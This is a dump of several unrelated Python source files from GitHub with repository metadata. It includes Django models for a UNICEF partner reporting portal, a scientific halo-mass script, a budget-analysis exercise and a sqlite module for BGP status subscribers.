sync_ca_reportable_update_to_pa_reportables(instance, created)\n\n\nclass ReportableLocationGoal(TimeStampedModel):\n reportable = models.ForeignKey(Reportable, on_delete=models.CASCADE)\n location = models.ForeignKey(\"core.Location\", on_delete=models.CASCADE)\n target = models.JSONField(\n default=default_value,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n baseline = models.JSONField(\n default=default_value,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n in_need = models.JSONField(\n blank=True, null=True,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n is_active = models.BooleanField(default=True)\n\n class Meta:\n unique_together = ('reportable', 'location')\n\n\nclass IndicatorReportManager(models.Manager):\n def active_reports(self):\n return self.objects.filter(\n report_status=INDICATOR_REPORT_STATUS.accepted)\n\n\nclass IndicatorReport(TimeStampedModel):\n \"\"\"\n IndicatorReport module is a result of partner staff activity (what they\n did in defined frequency scope).\n\n related models:\n indicator.Reportable (ForeignKey): \"indicator\"\n unicef.ProgressReport (ForeignKey): \"progress_report\"\n core.Location (OneToOneField): \"location\"\n indicator.ReportingEntity (ForeignKey): \"reporting_entity\"\n \"\"\"\n title = models.CharField(max_length=2048)\n reportable = models.ForeignKey(\n Reportable,\n related_name=\"indicator_reports\",\n on_delete=models.CASCADE,\n )\n progress_report = models.ForeignKey(\n 'unicef.ProgressReport',\n related_name=\"indicator_reports\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n )\n time_period_start = models.DateField() # first day of defined frequency mode\n time_period_end = models.DateField() # last day of defined frequency mode\n due_date = models.DateField() # can be few days/weeks out of the \"end date\"\n submission_date = models.DateField(null=True,\n blank=True,\n verbose_name=\"Date of submission\")\n frequency = models.CharField(\n max_length=3,\n choices=FREQUENCY_LEVEL,\n default=FREQUENCY_LEVEL.monthly,\n verbose_name='Frequency of reporting'\n )\n\n total = models.JSONField(\n default=default_total,\n validators=[JSONSchemaValidator(json_schema=indicator_schema)]\n )\n\n remarks = models.TextField(blank=True, null=True)\n report_status = models.CharField(\n choices=INDICATOR_REPORT_STATUS,\n default=INDICATOR_REPORT_STATUS.due,\n max_length=3\n )\n\n overall_status = models.CharField(\n choices=OVERALL_STATUS,\n default=OVERALL_STATUS.no_status,\n max_length=3\n )\n narrative_assessment = models.TextField(null=True, blank=True)\n\n review_date = models.DateField(verbose_name='Review Date',\n blank=True,\n null=True)\n sent_back_feedback = models.TextField(blank=True, null=True)\n\n parent = models.ForeignKey(\n 'self',\n related_name='children',\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n db_index=True,\n )\n\n reporting_entity = models.ForeignKey(\n 'indicator.ReportingEntity',\n related_name=\"indicator_reports\",\n on_delete=models.CASCADE,\n )\n\n project = models.ForeignKey(\n 'partner.PartnerProject',\n related_name=\"indicator_reports\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n )\n\n tracker = FieldTracker(fields=['report_status'])\n objects = IndicatorReportManager()\n\n class Meta:\n ordering = ['-due_date', '-id']\n # TODO: Enable this\n # unique_together = ('reportable', 'time_period_start', 'time_period_end')\n\n def __str__(self):\n return self.title\n\n def get_overall_status_display(self):\n if self.progress_report and self.progress_report.is_final and self.overall_status in FINAL_OVERALL_STATUS:\n return dict(FINAL_OVERALL_STATUS).get(self.overall_status)\n else:\n # This is one of the \"magical\" django methods and cannot be called directly using super call\n field_object = self._meta.get_field('overall_status')\n return self._get_FIELD_display(field_object)\n\n @property\n def is_complete(self):\n for location_disaggregation in IndicatorLocationData.objects.filter(indicator_report=self):\n if not location_disaggregation.is_complete:\n return False\n return True\n\n @property\n def is_draft(self):\n if self.submission_date is None and IndicatorLocationData.objects.filter(indicator_report=self).exists():\n return True\n return False\n\n @property\n def is_percentage(self):\n return self.display_type == self.reportable.blueprint.PERCENTAGE\n\n @property\n def is_number(self):\n return self.display_type == self.reportable.blueprint.NUMBER\n\n @property\n def can_import(self):\n if self.submission_date and self.report_status in [\n INDICATOR_REPORT_STATUS.accepted,\n INDICATOR_REPORT_STATUS.submitted]:\n return False\n return True\n\n @property\n def can_submit(self):\n if self.submission_date is not None and self.report_status == INDICATOR_REPORT_STATUS.sent_back:\n pass # lets go and check throw disaggregation\n elif self.submission_date and self.report_status in [\n INDICATOR_REPORT_STATUS.accepted,\n INDICATOR_REPORT_STATUS.submitted]:\n return False\n\n for data in self.indicator_location_data.all():\n if not data.is_complete:\n return False\n\n return True\n\n @property\n def progress_report_status(self):\n if self.progress_report:\n return self.progress_report.status\n else:\n return PROGRESS_REPORT_STATUS.due\n\n @property\n def status(self):\n # TODO: Check all disaggregation data across locations and return\n # status\n return 'fulfilled'\n\n @cached_property\n def disaggregations(self):\n return self.reportable.disaggregations.all()\n\n @cached_property\n def display_type(self):\n return self.reportable.blueprint.display_type\n\n @cached_property\n def display_time_period(self):\n return '{} - {}'.format(\n self.time_period_start.strftime(settings.PRINT_DATA_FORMAT),\n self.time_period_end.strftime(settings.PRINT_DATA_FORMAT),\n )\n\n @cached_property\n def calculation_formula_across_periods(self):\n return self.reportable.blueprint.calculation_formula_across_periods\n\n @cached_property\n def calculation_formula_across_locations(self):\n return self.reportable.blueprint.calculation_formula_across_locations\n\n def disaggregation_values(self, id_only=False, filter_by_id__in=None,\n flat=False):\n output_list = []\n\n disaggregations = self.disaggregations\n\n if filter_by_id__in:\n disaggregations = disaggregations.filter(id__in=filter_by_id__in)\n\n for disaggregation in disaggregations:\n if not id_only:\n disaggregation_value = disaggregation.disaggregation_values.order_by(\n 'id').values_list('id', 'value')\n\n else:\n disaggregation_value = disaggregation.disaggregation_values.order_by(\n 'id').values_list('id', flat=True)\n\n output_list.append(list(disaggregation_value))\n\n if flat:\n output_list = set(\n reduce(\n lambda acc,\n curr: acc + curr,\n output_list))\n\n return output_list\n\n\n@receiver(post_save, sender=IndicatorReport)\ndef send_notification_on_status_change(sender, instance, **kwargs):\n if instance.tracker.has_changed('report_status') and not getattr(instance, 'report_status_synced_from_pr', False):\n subject_template_path = 'emails/on_indicator_report_status_change_subject.txt'\n\n if instance.report_status == INDICATOR_REPORT_STATUS.sent_back:\n body_template_path = 'emails/on_indicator_report_status_change_sent_back_cluster.html'\n elif instance.report_status == INDICATOR_REPORT_STATUS.submitted:\n body_template_path = 'emails/on_indicator_report_status_change_submitted_cluster.html'\n else:\n return\n\n content_object = instance.reportable.content_object\n content_type_model = instance.reportable.content_type.model\n\n if content_type_model == 'clusterobjective':\n cluster = content_object.cluster\n indicator_type = 'cluster_objective'\n elif content_type_model == 'clusteractivity':\n cluster = content_object.cluster_objective.cluster\n indicator_type = 'cluster_activity'\n elif content_type_model == 'partneractivityprojectcontext' and content_object.activity.cluster_activity:\n cluster = content_object.activity.cluster_activity.cluster_objective.cluster\n indicator_type = 'partner_activity'\n else:\n cluster = None\n indicator_type = ''\n\n if cluster:\n cluster_imos = [role.user for role in cluster.old_prp_roles.filter(role=PRP_ROLE_TYPES.cluster_imo)]\n workspace_code = cluster.response_plan.workspace.workspace_code\n\n url_part = f'/app/{workspace_code}/cluster-reporting/plan/{cluster.response_plan_id}/results/draft'\n q_params = f'?indicator_type={indicator_type}&cluster_id={cluster.id}&indicator={instance.reportable_id}'\n ir_url = urljoin(settings.FRONTEND_HOST, url_part) + q_params\n\n template_data = {\n 'user': None,\n 'ir_url': ir_url,\n 'status': instance.get_report_status_display()\n }\n\n for user in cluster_imos:\n template_data['user'] = user\n to_email_list = [user.email]\n\n send_email_from_template(\n subject_template_path=subject_template_path,\n body_template_path=body_template_path,\n template_data=template_data,\n to_email_list=to_email_list,\n content_subtype='html',\n )\n\n\n@receiver(post_save,\n sender=IndicatorReport,\n dispatch_uid=\"unlock_ild_for_sent_back_cluster_ir\")\ndef unlock_ild_for_sent_back_cluster_ir(sender, instance, **kwargs):\n \"\"\"\n Whenever a Cluster indicator report is saved and found to be\n Sent back state then trigger unlock IndicatorLocationData instances.\n \"\"\"\n if instance.report_status != INDICATOR_REPORT_STATUS.sent_back \\\n and not isinstance(instance.reportable.content_object, PartnerActivity):\n return\n\n with transaction.atomic():\n instance.indicator_location_data.all().update(is_locked=False)\n\n child_irs = instance.children.values_list('id', flat=True)\n IndicatorLocationData.objects.filter(indicator_report__in=child_irs).update(is_locked=False)\n\n\n@receiver(post_save,\n sender=IndicatorReport,\n dispatch_uid=\"recalculate_reportable_total\")\ndef recalculate_reportable_total(sender, instance, **kwargs):\n \"\"\"\n Whenever an indicator report is saved and found to be Accepted or in\n Sent back state then trigger a recalculation fo the Reportable total.\n \"\"\"\n if instance.report_status != INDICATOR_REPORT_STATUS.accepted and \\\n instance.report_status != INDICATOR_REPORT_STATUS.sent_back:\n return\n\n reportable = instance.reportable\n blueprint = reportable.blueprint\n\n if instance.progress_report:\n # Only Accepted indicator reports for QPR progress report should be used.\n accepted_indicator_reports = IndicatorReport.objects.filter(\n reportable=reportable,\n report_status=INDICATOR_REPORT_STATUS.accepted,\n progress_report__report_type=REPORTING_TYPES.QPR,\n )\n else:\n # Only accepted indicator reports should be used.\n accepted_indicator_reports = reportable.indicator_reports.all().filter(\n report_status=INDICATOR_REPORT_STATUS.accepted)\n\n # Reset the reportable total\n reportable_total = {\n 'c': 0,\n 'd': 0,\n 'v': 0,\n }\n\n if accepted_indicator_reports.count() > 0:\n # If unit choice is NUMBER then have to handle sum, avg, max\n if blueprint.unit == IndicatorBlueprint.NUMBER:\n reportable_total['d'] = 1\n\n if blueprint.calculation_formula_across_periods == IndicatorBlueprint.MAX:\n max_total_ir = max(\n accepted_indicator_reports,\n key=lambda item: item.total['v'])\n reportable_total = max_total_ir.total\n elif blueprint.calculation_formula_across_periods == IndicatorBlueprint.LATEST:\n reportable_total = accepted_indicator_reports.order_by('-time_period_start').first().total\n else: # if its SUM or avg then add data up\n for indicator_report in accepted_indicator_reports:\n reportable_total['v'] += indicator_report.total['v']\n\n if blueprint.calculation_formula_across_periods == IndicatorBlueprint.AVG:\n ir_count = accepted_indicator_reports.count()\n if ir_count > 0:\n reportable_total['v'] = reportable_total['v'] / \\\n (ir_count * 1.0)\n\n reportable_total['c'] = reportable_total['v']\n\n elif blueprint.unit == IndicatorBlueprint.PERCENTAGE:\n latest_accepted_indicator_report = accepted_indicator_reports.order_by('-time_period_start').first()\n\n reportable_total['v'] = latest_accepted_indicator_report.total['v']\n reportable_total['d'] = latest_accepted_indicator_report.total['d']\n\n if reportable_total['d'] != 0:\n reportable_total['c'] = (reportable_total['v'] / (reportable_total['d'] * 1.0))\n\n if blueprint.display_type == IndicatorBlueprint.PERCENTAGE:\n reportable_total['c'] *= 100\n\n reportable.total = reportable_total\n reportable.save()\n\n # Triggering total recalculation on parent Reportable from its children\n if reportable.parent_indicator:\n new_parent_total = {\n 'c': 0,\n 'd': 1,\n 'v': 0,\n }\n child_totals = reportable.parent_indicator.children.values_list('total', flat=True)\n\n for total in child_totals:\n new_parent_total['v'] += total['v']\n new_parent_total['d'] += total['d']\n\n if reportable.parent_indicator.blueprint.unit == IndicatorBlueprint.NUMBER:\n new_parent_total['d'] = 1\n new_parent_total['c'] = new_parent_total['v']\n\n else:\n new_parent_total['c'] = new_parent_total['v'] / (new_parent_total['d'] * 1.0)\n\n if reportable.parent_indicator.blueprint.display_type == IndicatorBlueprint.PERCENTAGE:\n new_parent_total['c'] *= 100\n\n reportable.parent_indicator.total = new_parent_total\n reportable.parent_indicator.save()\n\n\nclass ReportingEntity(TimeStampedModel):\n \"\"\"\n ReportingEntity module it includes an organization entity for\n Cluster Activity indicator that is adopted from ProgrammeDocument\n \"\"\"\n title = models.CharField(max_length=256, unique=True)\n\n class Meta:\n ordering = ['id']\n verbose_name_plural = 'Reporting entities'\n\n def __str__(self):\n return \"Reporting entity: {}\".format(self.title)\n\n\ndef default_disaggregation():\n return {'()': {'c': 0, 'd': 0, 'v': 0}}\n\n\nclass IndicatorLocationData(TimeStampedModel):\n \"\"\"\n IndicatorLocationData module it includes indicators for chosen location.\n\n related models:\n indicator.IndicatorReport (ForeignKey): \"indicator_report\"\n core.Location (OneToOneField): \"location\"\n \"\"\"\n indicator_report = models.ForeignKey(\n IndicatorReport,\n related_name=\"indicator_location_data\",\n on_delete=models.CASCADE,\n )\n location = models.ForeignKey(\n 'core.Location',\n related_name=\"indicator_location_data\",\n on_delete=models.CASCADE,\n )\n\n disaggregation = models.JSONField(\n default=default_disaggregation,\n validators=[JSONSchemaValidator(json_schema=disaggregation_schema)]\n )\n num_disaggregation = models.IntegerField()\n level_reported = models.IntegerField()\n disaggregation_reported_on = ArrayField(models.IntegerField(), default=list)\n percentage_allocated = models.DecimalField(\n decimal_places=2,\n help_text='Entered data value allocation by %',\n max_digits=5,\n default=1.0000,\n )\n is_locked = models.BooleanField(default=False)\n\n class Meta:\n ordering = ['id']\n verbose_name_plural = 'Indicator location data'\n # TODO: enable\n # unique_together = ('indicator_report', 'location')\n\n def __str__(self):\n return \"{} Location Data for {}\".format(self.location, self.indicator_report)\n\n @cached_property\n def is_complete(self):\n \"\"\"\n Returns if this indicator location data has had some data entered for\n it, and is complete.\n \"\"\"\n # When changing this remember to adjust same method for indicator_report\n return self.modified != self.created\n\n @cached_property\n def previous_location_data(self):\n previous_indicator_reports = self.indicator_report.reportable.indicator_reports.exclude(\n id=self.indicator_report.id\n ).filter(time_period_start__lt=self.indicator_report.time_period_start)\n\n previous_report = previous_indicator_reports.order_by('-time_period_start').first()\n if previous_report:\n return previous_report.indicator_location_data.filter(location=self.location).first()\n\n @cached_property\n def previous_location_progress_value(self):\n if not self.previous_location_data:\n return 0\n\n total_disaggregation = self.previous_location_data.disaggregation.get('()', {})\n if self.indicator_report.is_percentage:\n return total_disaggregation.get(ValueType.CALCULATED, 0)\n else:\n return total_disaggregation.get(ValueType.VALUE, 0)\n","repo_name":"unicef/etools-partner-reporting-portal","sub_path":"django_api/etools_prp/apps/indicator/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":41856,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
+{"seq_id":"36292649767","text":"from django.db import models\n\n\n# Create your models here.\nclass ComplejidadRiesgo(models.Model):\n \"\"\"docstring for ComplejidadRiesgo\"\"\"\n def __init__(self, *args, **kwargs):\n super(ComplejidadRiesgo, self).__init__(*args, **kwargs)\n\n situacion = models.CharField(max_length=100, unique=True)\n descripcion = models.TextField()\n factor_complejidad = models.IntegerField()\n factor_riesgo = models.IntegerField()\n\n def __str__(self):\n return self.situacion\n\n class Meta:\n verbose_name = \"Complejidad y riesgo\"\n verbose_name_plural = \"Complejidades y riesgos\"\n ordering = [\"situacion\"]\n\n\nclass NivelComplejidadRiesgo(models.Model):\n \"\"\"docstring for NivelComplejidadRiesgo\"\"\"\n def __init__(self, *args, **kwargs):\n super(NivelComplejidadRiesgo, self).__init__(*args, **kwargs)\n\n nivel_complejidad_riesgo = models.CharField(max_length=25, unique=True)\n factor_inicial = models.IntegerField()\n factor_final = models.IntegerField()\n porcentaje = models.DecimalField(max_digits=7, decimal_places=2)\n\n def __str__(self):\n return self.nivel_complejidad_riesgo\n\n class Meta:\n verbose_name = \"Nivel de complejidad y riesgo\"\n verbose_name_plural = \"niveles de complejidades y riesgos\"\n ordering = [\"nivel_complejidad_riesgo\"]\n","repo_name":"yusnelvy/mtvmcotizacionv02","sub_path":"complejidadriesgo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"17224947822","text":"from rest_framework.routers import DefaultRouter\nfrom apps.reports.api.views.reports_viewset import ReportsViewSet\nfrom apps.reports.api.views.general_views import *\n\nrouter = DefaultRouter()\n\nrouter.register(r'reports',ReportsViewSet,basename = 'report')\nrouter.register(r'materias',MaterialsViewSet,basename = 'materias')\nrouter.register(r'tareo',TareoViewSet,basename = 'tareo')\nrouter.register(r'endurancetest',EndurancetestViewSet,basename = 'endurancetest')\nrouter.register(r'airforce',AirForceSerializerViewSet,basename = 'airforce')\nrouter.register(r'servicerequirement',ServiceRequirementViewSet,basename = 'servicerequirement')\nrouter.register(r'productservice',ProductServiceViewSet,basename = 'productservice')\n\nurlpatterns = router.urls","repo_name":"ricardoretamozo/corporacion_djangorest","sub_path":"apps/reports/api/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20353092426","text":"from setuptools import setup, Extension\nfrom pathlib import Path\n\nPATH_TO_C = Path(\"./numericalodes/c\")\n\n# https://setuptools.pypa.io/en/latest/userguide/ext_modules.html\n\nc = Extension(\n name=\"numericalodes.c\", # name of the module (like Python import)\n sources=[\n str(PATH_TO_C / file)\n for file in [\n \"c.c\",\n \"RungeKutta4Py.c\",\n \"matrix.c\",\n \"vector.c\",\n ]\n ],\n language=\"c\",\n)\n\nwith open(\"README.md\") as f:\n long_desc = f.read()\n\n# https://packaging.python.org/en/latest/guides/distributing-packages-using-setuptools/\n# https://stackoverflow.com/questions/7948494/whats-the-difference-between-a-python-module-and-a-python-package\n\nsetup(\n name=\"numericalodes\", # name of the package\n version=\"1.0\",\n description=\"Package with functions to calculate systems of ODEs numeracally similar to scipy.integrate.solve_ipv\",\n long_description=long_desc,\n author=\"Andreas Zach\",\n author_email=\"andreas.zach@student.tugraz.at\",\n url=\"https://github.com/zandivx/numericalodes\",\n license=\"MIT\",\n packages=[\"numericalodes\"],\n py_modules=[\"numericalodes.py\", \"numericalodes.c\"],\n ext_modules=[c],\n)\n","repo_name":"zandivx/numericalodes","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18993095679","text":"from scipy import optimize\nimport numpy as np\ndef ufunc(x,alpha,gamma,delta):\n a=-np.log10(10**(alpha*x)+1)\n b=(np.log10(1+np.exp(x)))**gamma\n c=1+np.exp(10**(-x))\n return a+delta*(b/c)\n\ndef getlgstellarmass(lghalomass,z=0,use='GK',cluster=False):\n \n a=1.0/(1+z)\n am1=a-1\n \n nu=np.exp(-4*a**2)\n\n if cluster:\n logep=-1.642\n logm1=11.35\n else:\n logep=-1.777-0.006*am1*nu-.119*am1\n logm1=11.514+(-1.793*am1-.251*z)*nu\n if use=='B':\n alpha=-1.412+(0.731*am1)*nu\n else:\n alpha=-1.92\n if cluster: #Kravtsov 2014\n# delta=4.394\n delta=4.335\n# alpha=-1.779\n alpha=-1.740\n# gamma=0.547\n gamma=0.531\n else:\n delta=3.508+(2.608*am1-0.043*z)*nu\n gamma=0.316+(1.319*am1+.279*z)*nu\n\n lgmstar=logep+logm1+ufunc(lghalomass-logm1,alpha,gamma,delta)-ufunc(0,alpha,gamma,delta)\n\n return lgmstar\n\ndef minfunc(lghalomass,stellarmass,z,use):\n return getlgstellarmass(lghalomass,z,use)-stellarmass\n\ndef gethalomass(stellarmass,z=0,use='GK',**args):\n if stellarmass>10.4:\n lower=10**((stellarmass-6.43)/5.26)\n upper=10**((stellarmass)/5.26)\n else:\n if use=='B':\n lower=(stellarmass+4.8)/1.41\n upper=(stellarmass+8.3)/1.41\n else:\n lower=(stellarmass+10.7)/1.92\n upper=(stellarmass+14.7)/1.92\n\n return optimize.brentq(minfunc,lower,upper,(stellarmass,z,use),**args)\n\n","repo_name":"timcarleton/Fokker_Plank","sub_path":"gethalomass.py","file_name":"gethalomass.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"998187252","text":"import os\nimport csv\n\nbudget_csv=os.path.join(\"C:\\\\Users\\\\18312\\\\Documents\\\\PythonStuff\\\\Python_Challenge\\\\PyBank\\\\budget_data.csv\")\n\nprint()\nprint(\"Financial Analysis\")\nprint(\"-------------------------------\")\n\ntotal_months=0\ntotal_sum=0\nprevious=0\nchange=0\ntotal_change=0\navg_change=0\ngreatest_inc=0\ngreatest_dec=9999999\n\nwith open(budget_csv, 'r') as csvfile:\n csvreader=csv.reader(csvfile, delimiter=',')\n header=next(csvreader)\n\n for row in csvreader:\n\n total_months=total_months+1\n total_sum=total_sum + int(row[1])\n \n \n change=int(row[1])-previous\n total_change=total_change+change\n previous=int(row[1])\n \n\n if change > greatest_inc:\n greatest_inc=change\n if change < greatest_dec:\n greatest_dec=change\n\navg_change=round(total_sum/total_months,2) \n\nprint(\"Total Months: \" + str(total_months))\nprint(\"Total: $\" +str(total_sum))\nprint(\"Average Change: $\" + str(avg_change))\nprint(\"Greatest Increase in Profits: \" + \" $\" + str(greatest_inc))\nprint(\"Greatest Decrease in Profits: \" + \" $\" + str(greatest_dec))\nprint()\n\ndata_output = os.path.join(\"PyBank\", \"PyBank.csv\")\nwith open(data_output, \"w\", newline=\"\") as datafile:\n writer = csv.writer(datafile)","repo_name":"Dillongrow/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"16262654221","text":"# -*- coding: utf-8 -*-\n\nimport sqlite3 as db_api\nimport logging\n\nimport os\nfrom sys import argv\n\nSUBSCRIBERS_DATABASE_NAME = \"subscribers.sqlite3\"\n\nERROR_STATE = None\nSUCCESS_STATE = 0\n\nbase_dirname = os.path.abspath(os.path.dirname(argv[0])) + \"/\"\n\n_database_global_handler = None\n\n\ndef db_connect(db_name=base_dirname+SUBSCRIBERS_DATABASE_NAME):\n\n try:\n db = db_api.connect(db_name, check_same_thread=False)\n except db_api.DatabaseError as e:\n logging.critical(\"Database open error - {}\".format(e))\n return None\n\n global _database_global_handler\n _database_global_handler = db\n\n return _database_global_handler\n\n\ndef save_bgp_table_status(bgp_timestamp, bgp4table_status, bgp6table_status, subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n if bgp4table_status is None or bgp6table_status is None:\n return ERROR_STATE\n\n db_query = \"UPDATE status SET DUMP_TIME = {:d}, IPV4_TEXT = '{:s}', IPV6_TEXT = '{:s}'\".format(\n bgp_timestamp, bgp4table_status, bgp6table_status)\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n db.commit()\n\n except db_api.DatabaseError as e:\n db.rollback()\n logging.critical(\"Database update error - {}\".format(e))\n return ERROR_STATE\n\n return SUCCESS_STATE\n\n\ndef load_bgp_table_status(subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n statuses_fields = (\"status.DUMP_TIME\", \"status.IPV4_TEXT\", \"status.IPV6_TEXT\")\n\n db_query = \"SELECT {} FROM status LIMIT 1\".format(\",\".join(statuses_fields))\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n\n statuses = db_cursor.fetchone()\n\n except db_api.DatabaseError as e:\n logging.critical(\"Database select error - {}\".format(e))\n return ERROR_STATE, ERROR_STATE, ERROR_STATE\n\n if statuses is None or len(statuses) == 0:\n logging.critical(\"Database BGP statuses returned empty data\")\n return ERROR_STATE, ERROR_STATE, ERROR_STATE\n\n bgp_timestamp = statuses[0]\n bgp4_status = statuses[1]\n bgp6_status = statuses[2]\n\n return bgp_timestamp, bgp4_status, bgp6_status\n\n\ndef save_subscriber(is_subscriber_v4, is_subscriber_v6, subscriber_id, subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n db_query_insert = \"INSERT INTO subscribers(subscriber_id, IPV4, IPV6) VALUES({:d},{:d},{:d})\".format(\n subscriber_id,\n is_subscriber_v4,\n is_subscriber_v6)\n\n db_query = \"UPDATE subscribers SET subscriber_id = {0:d}, IPV4 = {1:d}, IPV6 = {2:d} \\\n WHERE subscriber_id={0:d}\" .format(\n subscriber_id,\n is_subscriber_v4,\n is_subscriber_v6)\n\n subscriber_exist = False\n\n db_cursor = db.cursor()\n\n try:\n db_cursor.execute(db_query_insert)\n db.commit()\n except db_api.IntegrityError:\n db.rollback()\n subscriber_exist = True\n except db_api.DatabaseError as e:\n db.rollback()\n logging.critical(\"Database insert error - {}\".format(e))\n return ERROR_STATE\n\n if subscriber_exist:\n try:\n db_cursor.execute(db_query)\n db.commit()\n except db_api.DatabaseError as e:\n db.rollback()\n logging.critical(\"Database update error - {}\".format(e))\n return ERROR_STATE\n\n return SUCCESS_STATE\n\n\ndef delete_subscriber(subscriber_id, subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n db_query = \"DELETE FROM subscribers WHERE subscriber_id={:d}\" .format(subscriber_id)\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n db.commit()\n except db_api.DatabaseError as e:\n db.rollback()\n logging.critical(\"Database subscriber delete error - {}\".format(e))\n return ERROR_STATE\n\n return SUCCESS_STATE\n\n\ndef save_subscribers(subscribers_v4, subscribers_v6, subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n save_complete_status = SUCCESS_STATE\n subscribers = set().union(subscribers_v4, subscribers_v6)\n\n for subscriber_id in subscribers:\n is_subscriber_v4 = subscriber_id in subscribers_v4\n is_subscriber_v6 = subscriber_id in subscribers_v4\n\n if save_subscriber(is_subscriber_v4,\n is_subscriber_v6,\n subscriber_id, db) != SUCCESS_STATE:\n save_complete_status = ERROR_STATE\n\n return save_complete_status\n\n\ndef load_subscribers(table_type, subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n db_query = \"SELECT subscribers.subscriber_id FROM subscribers \\\nWHERE subscribers.{:s} = 1\".format(table_type)\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n\n subscribers = db_cursor.fetchall()\n\n except db_api.DatabaseError as e:\n logging.critical(\"Database select error - {}\".format(e))\n return ERROR_STATE\n\n if subscribers is None or len(subscribers) == 0:\n logging.critical(\"Database subscribers returned empty data\")\n return ERROR_STATE\n\n subscriber_ids, = zip(*subscribers)\n\n return set(subscriber_ids)\n\n\ndef db_close(subscribers_db):\n\n if subscribers_db is not None:\n subscribers_db.commit()\n subscribers_db.close()\n\n\ndef load_prefixes(timestamp=0, subscribers_db=None, last=True, trend=False):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n prefixes_fields = (\"prefixes.DUMP_TIME\", \"prefixes.IPV4\", \"prefixes.IPV6\")\n\n if last:\n order = 'DESC'\n else:\n order = 'ASC'\n\n db_query = \"SELECT {:s} FROM prefixes WHERE prefixes.DUMP_TIME > {:d} \" \\\n \"ORDER BY prefixes.DUMP_TIME {:s}\".format(\",\".join(prefixes_fields), timestamp, order)\n\n if trend is False:\n db_query = db_query + ' LIMIT 1'\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n\n if trend:\n prefixes = db_cursor.fetchall()\n else:\n prefixes = db_cursor.fetchone()\n\n except db_api.DatabaseError as e:\n logging.critical(\"Database select error - {}\".format(e))\n return timestamp, ERROR_STATE, ERROR_STATE\n\n if prefixes is None or len(prefixes) == 0:\n # logging.critical(\"Database BGP statuses returned empty data\")\n return timestamp, ERROR_STATE, ERROR_STATE\n\n if trend:\n bgp_timestamp = list()\n bgp4_prefixes = list()\n bgp6_prefixes = list()\n\n for dump_trend in prefixes:\n bgp_timestamp.append(dump_trend[0])\n bgp4_prefixes.append(dump_trend[1])\n bgp6_prefixes.append(dump_trend[2])\n else:\n bgp_timestamp = prefixes[0]\n bgp4_prefixes = prefixes[1]\n bgp6_prefixes = prefixes[2]\n\n return bgp_timestamp, bgp4_prefixes, bgp6_prefixes\n\n\ndef load_ases(timestamp, subscribers_db=None, last=True, trend=False):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n ases_fields = (\"ases.DUMP_TIME\",\n \"ases.ASNV4\", \"ases.ASNV6\",\n \"ases.ASNV4_ONLY\", \"ases.ASNV6_ONLY\",\n \"ases.ASNV4_32\", \"ases.ASNV6_32\")\n\n if last:\n order = 'DESC'\n else:\n order = 'ASC'\n\n db_query = \"SELECT {:s} FROM ases WHERE ases.DUMP_TIME > {:d} \" \\\n \"ORDER BY ases.DUMP_TIME {:s}\".format(\",\".join(ases_fields), timestamp, order)\n\n if trend is False:\n db_query = \"SELECT {:s} FROM ases WHERE ases.DUMP_TIME = {:d} LIMIT 1\".format(\",\".join(ases_fields), timestamp)\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n\n if trend:\n ases = db_cursor.fetchall()\n else:\n ases = db_cursor.fetchone()\n\n except db_api.DatabaseError as e:\n logging.critical(\"Database select error - {}\".format(e))\n return timestamp, (ERROR_STATE,)\n\n if ases is None or len(ases) == 0:\n # logging.critical(\"Database BGP statuses returned empty data\")\n return timestamp, (ERROR_STATE,)\n\n if trend:\n bgp_timestamp = list()\n ases_status = list()\n\n for dump_trend in ases:\n bgp_timestamp.append(dump_trend[0])\n ases_dump = list()\n for ases_trend in dump_trend[1:]:\n ases_dump.append(ases_trend)\n\n ases_status.append(ases_dump)\n else:\n bgp_timestamp = ases[0]\n ases_status = ases[1:]\n\n return bgp_timestamp, 